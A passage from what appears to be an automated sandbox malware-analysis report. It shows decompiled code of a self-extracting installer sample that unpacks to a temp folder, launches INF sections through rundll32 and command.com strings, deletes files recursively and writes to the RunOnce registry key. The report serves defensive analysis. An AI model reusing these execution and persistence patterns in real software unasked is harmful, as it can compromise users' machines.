                              									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xa71140, _t156, 8,  &_v268) == 0) {
                              										 *0xa79a34 =  *0xa79a34 & 0xfffffffb;
                              										if( *0xa79a40 != 0) {
                              											_t108 = "setupapi.dll";
                              										} else {
                              											_t108 = "setupx.dll";
                              											GetShortPathNameA( &_v268,  &_v268, 0x104);
                              										}
                              										if( *_t155 == 0) {
                              											_t155 = "DefaultInstall";
                              										}
                              										_push( &_v268);
                              										_push(_t155);
                              										E00A7171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                              									} else {
                              										 *0xa79a34 =  *0xa79a34 | 0x00000004;
                              										if( *_t155 == 0) {
                              											_t155 = "DefaultInstall";
                              										}
                              										E00A71680(_t108, 0x104, _t155);
                              										_t140 = 0x200;
                              										E00A71680(_t156, 0x200,  &_v268);
                              									}
                              									L53:
                              									_t62 = 1;
                              									 *_v1564 = _t156;
                              									L54:
                              									_pop(_t152);
                              									return E00A76CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                              								}
                              							}
                              						}
                              					}
                              				}
                              			}














































                              0x00a71af3
                              0x00a71afa
                              0x00a71b07
                              0x00a71b09
                              0x00a71b1a
                              0x00a71b20
                              0x00a71b2c
                              0x00a71b3b
                              0x00a71b40
                              0x00a71b2e
                              0x00a71b2e
                              0x00a71b33
                              0x00a71b33
                              0x00a71b46
                              0x00a71b4c
                              0x00a71b52
                              0x00a71b57
                              0x00a71b5d
                              0x00a71b61
                              0x00a71b9f
                              0x00a71b9f
                              0x00a71bb1
                              0x00a71bc2
                              0x00000000
                              0x00a71b63
                              0x00a71b63
                              0x00a71b65
                              0x00a71b68
                              0x00a71b68
                              0x00a71b6a
                              0x00a71b6b
                              0x00a71b6f
                              0x00a71b74
                              0x00000000
                              0x00000000
                              0x00a71b76
                              0x00a71b7b
                              0x00a71b86
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a71b8c
                              0x00a71b8c
                              0x00a71b98
                              0x00a71bc7
                              0x00a71bc9
                              0x00a71bcc
                              0x00a71bd3
                              0x00a71d75
                              0x00a71d76
                              0x00a71d78
                              0x00a71d7f
                              0x00a71e05
                              0x00a71e09
                              0x00000000
                              0x00000000
                              0x00a71e12
                              0x00a71e1b
                              0x00a71e73
                              0x00a71e21
                              0x00a71e21
                              0x00a71e28
                              0x00a71e37
                              0x00a71e3e
                              0x00a71e52
                              0x00a71e60
                              0x00a71e60
                              0x00a71e3e
                              0x00a71e79
                              0x00a71e7b
                              0x00a71e84
                              0x00000000
                              0x00a71d9b
                              0x00a71d9b
                              0x00a71da0
                              0x00a71da2
                              0x00a71da5
                              0x00a71da5
                              0x00a71da7
                              0x00a71da8
                              0x00a71dac
                              0x00a71dae
                              0x00a71db4
                              0x00a71db7
                              0x00a71db7
                              0x00a71db9
                              0x00a71dba
                              0x00a71dbe
                              0x00a71dc3
                              0x00a71dce
                              0x00a71dd2
                              0x00a71deb
                              0x00000000
                              0x00a71df0
                              0x00000000
                              0x00a71dd2
                              0x00a71bf7
                              0x00a71bfe
                              0x00a71c07
                              0x00a71d55
                              0x00a71d5a
                              0x00a71d5b
                              0x00a71d5d
                              0x00a71d5e
                              0x00000000
                              0x00a71c1b
                              0x00a71c1b
                              0x00a71c20
                              0x00a71c2c
                              0x00a71c33
                              0x00a71c38
                              0x00a71c3a
                              0x00a71c3a
                              0x00a71c40
                              0x00a71c4b
                              0x00a71c4b
                              0x00a71c5d
                              0x00a71c61
                              0x00a71dd4
                              0x00a71dd4
                              0x00a71dd6
                              0x00a71ddb
                              0x00a71ddc
                              0x00a71dde
                              0x00a71d64
                              0x00a71d64
                              0x00a71d67
                              0x00a71d6c
                              0x00000000
                              0x00a71c67
                              0x00a71c67
                              0x00a71c6d
                              0x00a71c72
                              0x00a71c74
                              0x00a71c74
                              0x00a71c8e
                              0x00a71c99
                              0x00a71cc0
                              0x00a71cf8
                              0x00a71d07
                              0x00a71d23
                              0x00a71d09
                              0x00a71d14
                              0x00a71d1b
                              0x00a71d1b
                              0x00a71d2b
                              0x00a71d2d
                              0x00a71d2d
                              0x00a71d38
                              0x00a71d39
                              0x00a71d46
                              0x00a71cc2
                              0x00a71cc2
                              0x00a71ccc
                              0x00a71cce
                              0x00a71cce
                              0x00a71cdb
                              0x00a71ce6
                              0x00a71cee
                              0x00a71cee
                              0x00a71e89
                              0x00a71e91
                              0x00a71e92
                              0x00a71e94
                              0x00a71e97
                              0x00a71ea4
                              0x00a71ea4
                              0x00a71c61
                              0x00a71c07
                              0x00a71bd3
                              0x00a71b7b

                              APIs
                              • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00A71BE7
                              • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00A71BFE
                              • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00A71C57
                              • GetPrivateProfileIntA.KERNEL32 ref: 00A71C88
                              • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00A71140,00000000,00000008,?), ref: 00A71CB8
                              • GetShortPathNameA.KERNEL32 ref: 00A71D1B
                                • Part of subcall function 00A744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A74518
                                • Part of subcall function 00A744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A74554
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                              • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                              • API String ID: 383838535-819679500
                              • Opcode ID: a9003cd272c7b228aabf165e0e92a9aa3d8fd4d7cf6ec0565496a3d0a2742870
                              • Instruction ID: 87251022e822e63d5cb9b1278ff16c75ecdb426dda28cc2759014819670e2c48
                              • Opcode Fuzzy Hash: a9003cd272c7b228aabf165e0e92a9aa3d8fd4d7cf6ec0565496a3d0a2742870
                              • Instruction Fuzzy Hash: EBA11870A002146BEB20DB2CCC45BEA77E9EB95310F54C6A9E55DA72C1DBB09D86CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 406 a72f1d-a72f3d 407 a72f3f-a72f46 406->407 408 a72f6c-a72f73 call a75164 406->408 410 a72f5f-a72f66 call a73a3f 407->410 411 a72f48 call a751e5 407->411 415 a73041 408->415 416 a72f79-a72f80 call a755a0 408->416 410->408 410->415 417 a72f4d-a72f4f 411->417 420 a73043-a73053 call a76ce0 415->420 416->415 424 a72f86-a72fbe GetSystemDirectoryA call a7658a LoadLibraryA 416->424 417->415 421 a72f55-a72f5d 417->421 421->408 421->410 428 a72ff7-a73004 FreeLibrary 424->428 429 a72fc0-a72fd4 GetProcAddress 424->429 431 a73017-a73024 SetCurrentDirectoryA 428->431 432 a73006-a7300c 428->432 429->428 430 a72fd6-a72fee DecryptFileA 429->430 430->428 445 a72ff0-a72ff5 430->445 434 a73026-a7303c call a744b9 call a76285 431->434 435 a73054-a7305a 431->435 432->431 433 a7300e call a7621e 432->433 441 a73013-a73015 433->441 434->415 439 a73065-a7306c 435->439 440 a7305c call a73b26 435->440 442 a7306e-a73075 call a7256d 439->442 443 a7307c-a73089 439->443 447 a73061-a73063 440->447 441->415 441->431 452 a7307a 442->452 449 a730a1-a730a9 443->449 450 a7308b-a73091 443->450 445->428 447->415 447->439 455 a730b4-a730b7 449->455 456 a730ab-a730ad 449->456 450->449 453 a73093 call a73ba2 450->453 452->443 459 a73098-a7309a 453->459 455->420 456->455 458 a730af call a74169 456->458 458->455 459->415 461 a7309c 459->461 461->449
                              C-Code - Quality: 82%
                              			E00A72F1D(void* __ecx, int __edx) {
                              				signed int _v8;
                              				char _v272;
                              				_Unknown_base(*)()* _v276;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t9;
                              				void* _t11;
                              				struct HWND__* _t12;
                              				void* _t14;
                              				int _t21;
                              				signed int _t22;
                              				signed int _t25;
                              				intOrPtr* _t26;
                              				signed int _t27;
                              				void* _t30;
                              				_Unknown_base(*)()* _t31;
                              				void* _t34;
                              				struct HINSTANCE__* _t36;
                              				intOrPtr _t41;
                              				intOrPtr* _t44;
                              				signed int _t46;
                              				int _t47;
                              				void* _t58;
                              				void* _t59;
                              
                              				_t43 = __edx;
                              				_t9 =  *0xa78004; // 0x74742267
                              				_v8 = _t9 ^ _t46;
                              				if( *0xa78a38 != 0) {
                              					L5:
                              					_t11 = E00A75164(_t52);
                              					_t53 = _t11;
                              					if(_t11 == 0) {
                              						L16:
                              						_t12 = 0;
                              						L17:
                              						return E00A76CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                              					}
                              					_t14 = E00A755A0(_t53); // executed
                              					if(_t14 == 0) {
                              						goto L16;
                              					} else {
                              						_t45 = 0x105;
                              						GetSystemDirectoryA( &_v272, 0x105);
                              						_t43 = 0x105;
                              						_t40 =  &_v272;
                              						E00A7658A( &_v272, 0x105, "advapi32.dll");
                              						_t36 = LoadLibraryA( &_v272);
                              						_t44 = 0;
                              						if(_t36 != 0) {
                              							_t31 = GetProcAddress(_t36, "DecryptFileA");
                              							_v276 = _t31;
                              							if(_t31 != 0) {
                              								_t45 = _t47;
                              								_t40 = _t31;
                              								 *0xa7a288("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                              								_v276();
                              								if(_t47 != _t47) {
                              									_t40 = 4;
                              									asm("int 0x29");
                              								}
                              							}
                              						}
                              						FreeLibrary(_t36);
                              						_t58 =  *0xa78a24 - _t44; // 0x0
                              						if(_t58 != 0) {
                              							L14:
                              							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\"); // executed
                              							if(_t21 != 0) {
                              								__eflags =  *0xa78a2c - _t44; // 0x0
                              								if(__eflags != 0) {
                              									L20:
                              									__eflags =  *0xa78d48 & 0x000000c0;
                              									if(( *0xa78d48 & 0x000000c0) == 0) {
                              										_t41 =  *0xa79a40; // 0x3, executed
                              										_t26 = E00A7256D(_t41); // executed
                              										_t44 = _t26;
                              									}
                              									_t22 =  *0xa78a24; // 0x0
                              									 *0xa79a44 = _t44;
                              									__eflags = _t22;
                              									if(_t22 != 0) {
                              										L26:
                              										__eflags =  *0xa78a38;
                              										if( *0xa78a38 == 0) {
                              											__eflags = _t22;
                              											if(__eflags == 0) {
                              												E00A74169(__eflags);
                              											}
                              										}
                              										_t12 = 1;
                              										goto L17;
                              									} else {
                              										__eflags =  *0xa79a30 - _t22; // 0x0
                              										if(__eflags != 0) {
                              											goto L26;
                              										}
                              										_t25 = E00A73BA2(); // executed
                              										__eflags = _t25;
                              										if(_t25 == 0) {
                              											goto L16;
                              										}
                              										_t22 =  *0xa78a24; // 0x0
                              										goto L26;
                              									}
                              								}
                              								_t27 = E00A73B26(_t40, _t44);
                              								__eflags = _t27;
                              								if(_t27 == 0) {
                              									goto L16;
                              								}
                              								goto L20;
                              							}
                              							_t43 = 0x4bc;
                              							E00A744B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                              							 *0xa79124 = E00A76285();
                              							goto L16;
                              						}
                              						_t59 =  *0xa79a30 - _t44; // 0x0
                              						if(_t59 != 0) {
                              							goto L14;
                              						}
                              						_t30 = E00A7621E(); // executed
                              						if(_t30 == 0) {
                              							goto L16;
                              						}
                              						goto L14;
                              					}
                              				}
                              				_t49 =  *0xa78a24;
                              				if( *0xa78a24 != 0) {
                              					L4:
                              					_t34 = E00A73A3F(_t51);
                              					_t52 = _t34;
                              					if(_t34 == 0) {
                              						goto L16;
                              					}
                              					goto L5;
                              				}
                              				if(E00A751E5(_t49) == 0) {
                              					goto L16;
                              				}
                              				_t51 =  *0xa78a38;
                              				if( *0xa78a38 != 0) {
                              					goto L5;
                              				}
                              				goto L4;
                              			}




























                              0x00a72f1d
                              0x00a72f28
                              0x00a72f2f
                              0x00a72f3d
                              0x00a72f6c
                              0x00a72f6c
                              0x00a72f71
                              0x00a72f73
                              0x00a73041
                              0x00a73041
                              0x00a73043
                              0x00a73053
                              0x00a73053
                              0x00a72f79
                              0x00a72f80
                              0x00000000
                              0x00a72f86
                              0x00a72f86
                              0x00a72f93
                              0x00a72f9e
                              0x00a72fa0
                              0x00a72fa6
                              0x00a72fb8
                              0x00a72fba
                              0x00a72fbe
                              0x00a72fc6
                              0x00a72fcc
                              0x00a72fd4
                              0x00a72fd6
                              0x00a72fd8
                              0x00a72fe0
                              0x00a72fe6
                              0x00a72fee
                              0x00a72ff0
                              0x00a72ff5
                              0x00a72ff5
                              0x00a72fee
                              0x00a72fd4
                              0x00a72ff8
                              0x00a72ffe
                              0x00a73004
                              0x00a73017
                              0x00a7301c
                              0x00a73024
                              0x00a73054
                              0x00a7305a
                              0x00a73065
                              0x00a73065
                              0x00a7306c
                              0x00a7306e
                              0x00a73075
                              0x00a7307a
                              0x00a7307a
                              0x00a7307c
                              0x00a73081
                              0x00a73087
                              0x00a73089
                              0x00a730a1
                              0x00a730a1
                              0x00a730a9
                              0x00a730ab
                              0x00a730ad
                              0x00a730af
                              0x00a730af
                              0x00a730ad
                              0x00a730b6
                              0x00000000
                              0x00a7308b
                              0x00a7308b
                              0x00a73091
                              0x00000000
                              0x00000000
                              0x00a73093
                              0x00a73098
                              0x00a7309a
                              0x00000000
                              0x00000000
                              0x00a7309c
                              0x00000000
                              0x00a7309c
                              0x00a73089
                              0x00a7305c
                              0x00a73061
                              0x00a73063
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a73063
                              0x00a7302b
                              0x00a73032
                              0x00a7303c
                              0x00000000
                              0x00a7303c
                              0x00a73006
                              0x00a7300c
                              0x00000000
                              0x00000000
                              0x00a7300e
                              0x00a73015
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a73015
                              0x00a72f80
                              0x00a72f3f
                              0x00a72f46
                              0x00a72f5f
                              0x00a72f5f
                              0x00a72f64
                              0x00a72f66
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a72f66
                              0x00a72f4f
                              0x00000000
                              0x00000000
                              0x00a72f55
                              0x00a72f5d
                              0x00000000
                              0x00000000
                              0x00000000

                              APIs
                              • GetSystemDirectoryA.KERNEL32 ref: 00A72F93
                              • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00A72FB2
                              • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00A72FC6
                              • DecryptFileA.ADVAPI32 ref: 00A72FE6
                              • FreeLibrary.KERNEL32(00000000), ref: 00A72FF8
                              • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A7301C
                                • Part of subcall function 00A751E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A72F4D,?,00000002,00000000), ref: 00A75201
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                              • API String ID: 2126469477-3023407756
                              • Opcode ID: 6c282042ea74dd37ce8d80a095b5194998f0a5b4a82ec5741ea3f9b2821b7e0f
                              • Instruction ID: 7bd2d7ddf03c94b80a5db2a5aff323aa9e90f4e6a280124c4666f25abdc17e14
                              • Opcode Fuzzy Hash: 6c282042ea74dd37ce8d80a095b5194998f0a5b4a82ec5741ea3f9b2821b7e0f
                              • Instruction Fuzzy Hash: 7F41D632A00205AADF30EBB19D4975B33A89B95791F12C576E90DC2191EF74CEC3DB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 86%
                              			E00A72390(CHAR* __ecx) {
                              				signed int _v8;
                              				char _v276;
                              				char _v280;
                              				char _v284;
                              				struct _WIN32_FIND_DATAA _v596;
                              				struct _WIN32_FIND_DATAA _v604;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t21;
                              				int _t36;
                              				void* _t46;
                              				void* _t62;
                              				void* _t63;
                              				CHAR* _t65;
                              				void* _t66;
                              				signed int _t67;
                              				signed int _t69;
                              
                              				_t69 = (_t67 & 0xfffffff8) - 0x254;
                              				_t21 =  *0xa78004; // 0x74742267
                              				_t22 = _t21 ^ _t69;
                              				_v8 = _t21 ^ _t69;
                              				_t65 = __ecx;
                              				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                              					L10:
                              					_pop(_t62);
                              					_pop(_t66);
                              					_pop(_t46);
                              					return E00A76CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                              				} else {
                              					E00A71680( &_v276, 0x104, __ecx);
                              					_t58 = 0x104;
                              					E00A716B3( &_v280, 0x104, "*");
                              					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                              					_t63 = _t22;
                              					if(_t63 == 0xffffffff) {
                              						goto L10;
                              					} else {
                              						goto L3;
                              					}
                              					do {
                              						L3:
                              						_t58 = 0x104;
                              						E00A71680( &_v276, 0x104, _t65);
                              						if((_v604.ftCreationTime & 0x00000010) == 0) {
                              							_t58 = 0x104;
                              							E00A716B3( &_v276, 0x104,  &(_v596.dwReserved1));
                              							SetFileAttributesA( &_v280, 0x80);
                              							DeleteFileA( &_v280);
                              						} else {
                              							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                              								E00A716B3( &_v276, 0x104,  &(_v596.cFileName));
                              								_t58 = 0x104;
                              								E00A7658A( &_v280, 0x104, 0xa71140);
                              								E00A72390( &_v284);
                              							}
                              						}
                              						_t36 = FindNextFileA(_t63,  &_v596); // executed
                              					} while (_t36 != 0);
                              					FindClose(_t63); // executed
                              					_t22 = RemoveDirectoryA(_t65); // executed
                              					goto L10;
                              				}
                              			}





















                              0x00a72398
                              0x00a7239e
                              0x00a723a3
                              0x00a723a5
                              0x00a723ae
                              0x00a723b3
                              0x00a724cb
                              0x00a724d2
                              0x00a724d3
                              0x00a724d4
                              0x00a724df
                              0x00a723c2
                              0x00a723d1
                              0x00a723db
                              0x00a723e4
                              0x00a723f6
                              0x00a723fc
                              0x00a72401
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a72407
                              0x00a72407
                              0x00a72408
                              0x00a72411
                              0x00a7241f
                              0x00a7247a
                              0x00a72483
                              0x00a72495
                              0x00a724a3
                              0x00a72421
                              0x00a7242f
                              0x00a72453
                              0x00a7245d
                              0x00a72466
                              0x00a72472
                              0x00a72472
                              0x00a7242f
                              0x00a724af
                              0x00a724b5
                              0x00a724be
                              0x00a724c5
                              0x00000000
                              0x00a724c5

                              APIs
                              • FindFirstFileA.KERNELBASE(?,00A78A3A,00A711F4,00A78A3A,00000000,?,?), ref: 00A723F6
                              • lstrcmpA.KERNEL32(?,00A711F8), ref: 00A72427
                              • lstrcmpA.KERNEL32(?,00A711FC), ref: 00A7243B
                              • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00A72495
                              • DeleteFileA.KERNEL32(?), ref: 00A724A3
                              • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00A724AF
                              • FindClose.KERNELBASE(00000000), ref: 00A724BE
                              • RemoveDirectoryA.KERNELBASE(00A78A3A), ref: 00A724C5
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                              • String ID:
                              • API String ID: 836429354-0
                              • Opcode ID: f967554708b6ae56b5b363b61fa90c37b93c973c32608f6d217f2cf8f76837d7
                              • Instruction ID: 00bd3635478d9a49dc931c6c598f39838739f0f4d4df473ab9f01a61261acd27
                              • Opcode Fuzzy Hash: f967554708b6ae56b5b363b61fa90c37b93c973c32608f6d217f2cf8f76837d7
                              • Instruction Fuzzy Hash: 9C318432604740ABD320EBA8CD89BEF73ECABC4315F04CD2DB55D86290EB34994AC752
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 70%
                              			E00A72BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				long _t4;
                              				void* _t6;
                              				intOrPtr _t7;
                              				void* _t9;
                              				struct HINSTANCE__* _t12;
                              				intOrPtr* _t17;
                              				signed char _t19;
                              				intOrPtr* _t21;
                              				void* _t22;
                              				void* _t24;
                              				intOrPtr _t32;
                              
                              				_t4 = GetVersion();
                              				if(_t4 >= 0 && _t4 >= 6) {
                              					_t12 = GetModuleHandleW(L"Kernel32.dll");
                              					if(_t12 != 0) {
                              						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                              						if(_t21 != 0) {
                              							_t17 = _t21;
                              							 *0xa7a288(0, 1, 0, 0);
                              							 *_t21();
                              							_t29 = _t24 - _t24;
                              							if(_t24 != _t24) {
                              								_t17 = 4;
                              								asm("int 0x29");
                              							}
                              						}
                              					}
                              				}
                              				_t20 = _a12;
                              				_t18 = _a4;
                              				 *0xa79124 = 0;
                              				if(E00A72CAA(_a4, _a12, _t29, _t17) != 0) {
                              					_t9 = E00A72F1D(_t18, _t20); // executed
                              					_t22 = _t9; // executed
                              					E00A752B6(0, _t18, _t21, _t22); // executed
                              					if(_t22 != 0) {
                              						_t32 =  *0xa78a3a; // 0x0
                              						if(_t32 == 0) {
                              							_t19 =  *0xa79a2c; // 0x0
                              							if((_t19 & 0x00000001) != 0) {
                              								E00A71F90(_t19, _t21, _t22);
                              							}
                              						}
                              					}
                              				}
                              				_t6 =  *0xa78588; // 0x0
                              				if(_t6 != 0) {
                              					CloseHandle(_t6);
                              				}
                              				_t7 =  *0xa79124; // 0x0
                              				return _t7;
                              			}


















                              0x00a72c03
                              0x00a72c0d
                              0x00a72c18
                              0x00a72c20
                              0x00a72c2e
                              0x00a72c32
                              0x00a72c36
                              0x00a72c3d
                              0x00a72c43
                              0x00a72c45
                              0x00a72c47
                              0x00a72c49
                              0x00a72c4e
                              0x00a72c4e
                              0x00a72c47
                              0x00a72c32
                              0x00a72c20
                              0x00a72c50
                              0x00a72c54
                              0x00a72c57
                              0x00a72c64
                              0x00a72c66
                              0x00a72c6b
                              0x00a72c6d
                              0x00a72c74
                              0x00a72c76
                              0x00a72c7c
                              0x00a72c7e
                              0x00a72c87
                              0x00a72c89
                              0x00a72c89
                              0x00a72c87
                              0x00a72c7c
                              0x00a72c74
                              0x00a72c8e
                              0x00a72c95
                              0x00a72c98
                              0x00a72c98
                              0x00a72c9e
                              0x00a72ca7

                              APIs
                              • GetVersion.KERNEL32(?,00000002,00000000,?,00A76BB0,00A70000,00000000,00000002,0000000A), ref: 00A72C03
                              • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00A76BB0,00A70000,00000000,00000002,0000000A), ref: 00A72C18
                              • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00A72C28
                              • CloseHandle.KERNEL32(00000000,?,?,00A76BB0,00A70000,00000000,00000002,0000000A), ref: 00A72C98
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Handle$AddressCloseModuleProcVersion
                              • String ID: HeapSetInformation$Kernel32.dll
                              • API String ID: 62482547-3460614246
                              • Opcode ID: 5e6fa2ed29bcb1ab3081738405f8276a983bfa53fd6967a2ac3d24f29a6640a9
                              • Instruction ID: 2404c05a7d55bace50c4dbc912bb2a97bdebb78c70061bcfc1b470783b2dc2ac
                              • Opcode Fuzzy Hash: 5e6fa2ed29bcb1ab3081738405f8276a983bfa53fd6967a2ac3d24f29a6640a9
                              • Instruction Fuzzy Hash: 5D11E9313003056BD711ABF5AD49B6F3799DBA4391B14C535F90DD3251EA34DC8387A5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A76F40() {
                              
                              				SetUnhandledExceptionFilter(E00A76EF0); // executed
                              				return 0;
                              			}



                              0x00a76f45
                              0x00a76f4d

                              APIs
                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00A76F45
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 5a9a7ae741fc2d728e4f27578409b390a91e87bf6f9b5947f014fe62754f2162
                              • Instruction ID: 9042eefac8166ed8de3ac5b70cecc3194e9f512426a983daf0fe23d561e65f6f
                              • Opcode Fuzzy Hash: 5a9a7ae741fc2d728e4f27578409b390a91e87bf6f9b5947f014fe62754f2162
                              • Instruction Fuzzy Hash: F290026425150067A6505BB09D1955976916A9D612BC1D960A019C4494DB6040819522
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 93%
                              			E00A7202A(struct HINSTANCE__* __edx) {
                              				signed int _v8;
                              				char _v268;
                              				char _v528;
                              				void* _v532;
                              				int _v536;
                              				int _v540;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t28;
                              				long _t36;
                              				long _t41;
                              				struct HINSTANCE__* _t46;
                              				intOrPtr _t49;
                              				intOrPtr _t50;
                              				CHAR* _t54;
                              				void _t56;
                              				signed int _t66;
                              				intOrPtr* _t72;
                              				void* _t73;
                              				void* _t75;
                              				void* _t80;
                              				intOrPtr* _t81;
                              				void* _t86;
                              				void* _t87;
                              				void* _t90;
                              				_Unknown_base(*)()* _t91;
                              				signed int _t93;
                              				void* _t94;
                              				void* _t95;
                              
                              				_t79 = __edx;
                              				_t28 =  *0xa78004; // 0x74742267
                              				_v8 = _t28 ^ _t93;
                              				_t84 = 0x104;
                              				memset( &_v268, 0, 0x104);
                              				memset( &_v528, 0, 0x104);
                              				_t95 = _t94 + 0x18;
                              				_t66 = 0;
                              				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                              				if(_t36 != 0) {
                              					L24:
                              					return E00A76CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                              				}
